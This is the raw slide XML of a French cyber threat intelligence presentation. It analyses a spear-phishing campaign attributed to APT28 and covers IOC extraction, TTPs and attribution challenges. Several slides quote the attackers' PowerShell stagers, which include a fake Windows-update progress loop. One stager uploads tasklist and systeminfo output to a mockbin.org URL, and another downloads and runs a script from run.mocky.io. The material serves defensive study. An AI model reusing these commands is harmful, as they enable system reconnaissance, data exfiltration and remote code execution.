              <a:t>	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Write-Progress -Activity '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Updating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 Windows' -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Status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 'Dynamic Cumulative Update for Windows (KB5023696)' -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PercentComplete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 $i;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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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Write-Host 'Complete!’;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exit </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3664191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ANALYSE TACTIQUE – phase 2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9A2661-1BC4-9951-11E9-2F592B9E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91149"/>
            <a:ext cx="7308304" cy="856884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9F832363-EE3D-4F52-0F45-01B0DA9C9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72" y="2840113"/>
            <a:ext cx="8047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$T=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tasklist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$S=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systeminfo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(New-Object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System.Net.WebClient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).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UploadString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('http://mockbin.org/bin/b8427b58-7497-46cd-a5b2-6ff6a40b4592',$T+$S)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054516-DD91-7349-52B9-FF144A14541C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4025097"/>
            <a:ext cx="759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err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Affiche une liste des processus en cours d'exécution sur un ordinateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>local ou distant.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D1F1522-DCFF-7351-6102-FA31CE8A3EE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="4830285"/>
            <a:ext cx="8301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err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Affiche des informations de configuration détaillées sur un ordinateur, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y compris la configuration de l’OS, les informations de sécurité, l'identifiant du produit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et les propriétés du matériel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290605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Discours martial – pourquoi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9EBE25-CBE2-FFB5-586C-7CD8033775AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="2367321"/>
            <a:ext cx="6141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« Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> Intelligence »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t>                   (CTI)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5A12E43-F91C-AE6E-4B4E-D923398E255D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643240" y="4030455"/>
            <a:ext cx="8147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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Renseignement sur les cybermenaces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7E858F-A49B-142C-0ED8-6CEA2D8FA6DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2789012" y="5189011"/>
            <a:ext cx="356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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : Cyber-renseignement défensif</a:t>
            </a:r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ANALYSE TACTIQUE – phase 3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4BAF9FB-2D84-2A0E-463C-E7AE942C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646727"/>
            <a:ext cx="786818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powershell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 $update='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windows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$url='https://www.catalog.update.microsoft.com/scopedviewinline.aspx?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updateid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=a4b6625c-226e-4dbc-baec-1dbd854b8015’;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$command='run';$version='v3';$updateid='3b44f33d-b6e5-4ec6-b120-99b6ac52f74b';$scheme='http://’;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$url=$scheme+$command+'.mocky[.]io/'+$version+'/'+$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updateid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$r=(new-object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system.net.webclient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).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downloadstring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($url);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powershell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 $r;&amp;exit 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20F76C9-6C99-ACE2-DF4E-F5ACE2DB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54" y="3227742"/>
            <a:ext cx="1290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77[.]75.78.125 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0EE6588-CA91-F171-F87E-8467257F5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01" y="3934904"/>
            <a:ext cx="51739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hXXp://run.mocky[.]io/v3/ef4c7798-fc09-42cd-8431-91a22d5728d9 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53D15CC2-66B2-77CB-710D-A851D3353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178985"/>
            <a:ext cx="52068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hXXp://run.mocky[.]io/v3/3b44f33d-b6e5-4ec6-b120-99b6ac52f74b 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9B12D340-5CD5-4B94-1B0B-C803085EA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423066"/>
            <a:ext cx="52363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hXXp://mockbin[.]org/bin/b8427b58-7497-46cd-a5b2-6ff6a40b4592 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4AA7609-6696-C119-83DD-842C16D1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000055"/>
            <a:ext cx="124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mockbin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[.]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org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 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1FD98D33-AE81-95D6-5F2E-B25CD574D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47" y="5301221"/>
            <a:ext cx="12875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run.mocky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[.]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35AE9"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>io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935AE9"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>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1016B8E-0CD0-2E8A-690D-4B8C6A2A37F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894115" y="1385117"/>
            <a:ext cx="721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                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extraction des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOCs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – cluster d’indicateurs (attribution tactique)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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5AFF24F-CCE5-3BAF-067B-21BF0827230F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457950" y="1844577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Host-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill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34EF0B8-C52E-8B18-78F1-D90A82A67327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5868144" y="2029243"/>
            <a:ext cx="589806" cy="417703"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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2368C5A-F1FC-1C66-325F-D824E6608623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306816" y="3351561"/>
            <a:ext cx="44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>
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/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AE05A6D-1D12-C853-A234-676BFD63F692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1655100" y="3536227"/>
            <a:ext cx="3651716" cy="74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BCB78DB7-E5B2-F1C4-AC95-626641AF2B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6873522" y="406448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URLs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165EA17-B77C-C1CE-A04A-A04EEF8D1810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5559898" y="4242681"/>
            <a:ext cx="1313624" cy="6472"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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04DE3E75-8C17-5BB5-6DC0-972A5F64AAFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4067944" y="515394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>
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domains</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRP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8A0D391C-C7BF-335F-98CA-B1D325208943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1655100" y="5338609"/>
            <a:ext cx="2412844" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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67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ANALYSE operationelle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854859C-5259-D8E2-369E-463E003F92A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1544627"/>
            <a:ext cx="7704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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etablir le mode opératoire (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TTPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)-cluster d’activités (attribution opérationnelle)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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90F5CC-BCF9-B9D8-9DB9-40BA55766CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="2492896"/>
            <a:ext cx="76676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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Campagne de « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> phishing » avec leurre « Admin »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofing de l’adresse de l’expéditeur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utilisation d’un service mail gratuit sans protections spécifiques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enchainement de multiples « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stagers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> » PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abus des APIs d’un service public gratuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exfiltration des informations depuis les cibles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hypothèse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase de reconnaissance et récolte des informations pour exploitation ultérieure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C6B5BA-00D6-EDD3-D088-6888653D98A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446705" y="1979042"/>
            <a:ext cx="1580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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A. Comment ?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02909C-4614-B747-1A7C-8257BC85905B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446705" y="4394429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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B. Pourquoi ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1888552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ANALYSE operationelle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4E3CD1-8B73-6C18-4483-22707102B26A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809014" y="213285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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C. Qui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3B859F-10DA-983A-7C78-8FF10F4311E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="2528552"/>
            <a:ext cx="751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Conclusion du rapport CERT-UA : « L'activité est portée par le groupe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. »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5537B4-EB31-1AB3-71E2-0B853546C6B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421740" y="3078977"/>
            <a:ext cx="872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1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attribution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F608B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- le processus d'identification de la source (origine) d'une activité malveillante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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DA5D95-BA7E-F963-4502-F9F8D7910BB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903506" y="3536641"/>
            <a:ext cx="7848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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniques d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'anonymisation et de masquage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(VPN, Tor) - difficile de remonter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>à la source de l'attaque.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0763CA3-BE3F-EF91-4B39-F9C437985FBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839993" y="4295731"/>
            <a:ext cx="7567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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serveurs proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – répartissement de l'attaque sur plusieurs points </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d'extrémité.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9271C3B-B537-8913-8246-FA42456BDA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809014" y="5038103"/>
            <a:ext cx="754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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False Flags </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- la fausse piste intentionnelle rend difficile l'attribution précise.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8106B0-A593-38A1-EA9C-639F06EC366A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801907" y="5498343"/>
            <a:ext cx="8120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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implication des États-nations- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des techniques avancées pour dissimuler les traces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et minimiser les chances d'être retrouvés dans leur pays d'origine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="550009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ANALYSE stratégique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C2144F-9BBC-022B-B805-4D52A1DF6966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413698" y="2804563"/>
            <a:ext cx="8361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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>APT (Advanced Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Menace sophistiquée et ciblée menée </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>par des acteurs hautement qualifiés et motivés, disposant généralement de ressources </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>importantes et poursuivant des objectifs à long terme.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69A3FF-6834-1513-E515-DB2DE17C8B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091273" y="3812561"/>
            <a:ext cx="46045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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Caractéristiques :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniques avancées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Approche ciblée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opérations furtives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implication d'un État-nation ou d'un groupe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>criminel avancé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239B96-F69A-3A75-46FC-2865C3C1C505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483768" y="1538233"/>
            <a:ext cx="48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935AE9"/>
                </a:solidFill>
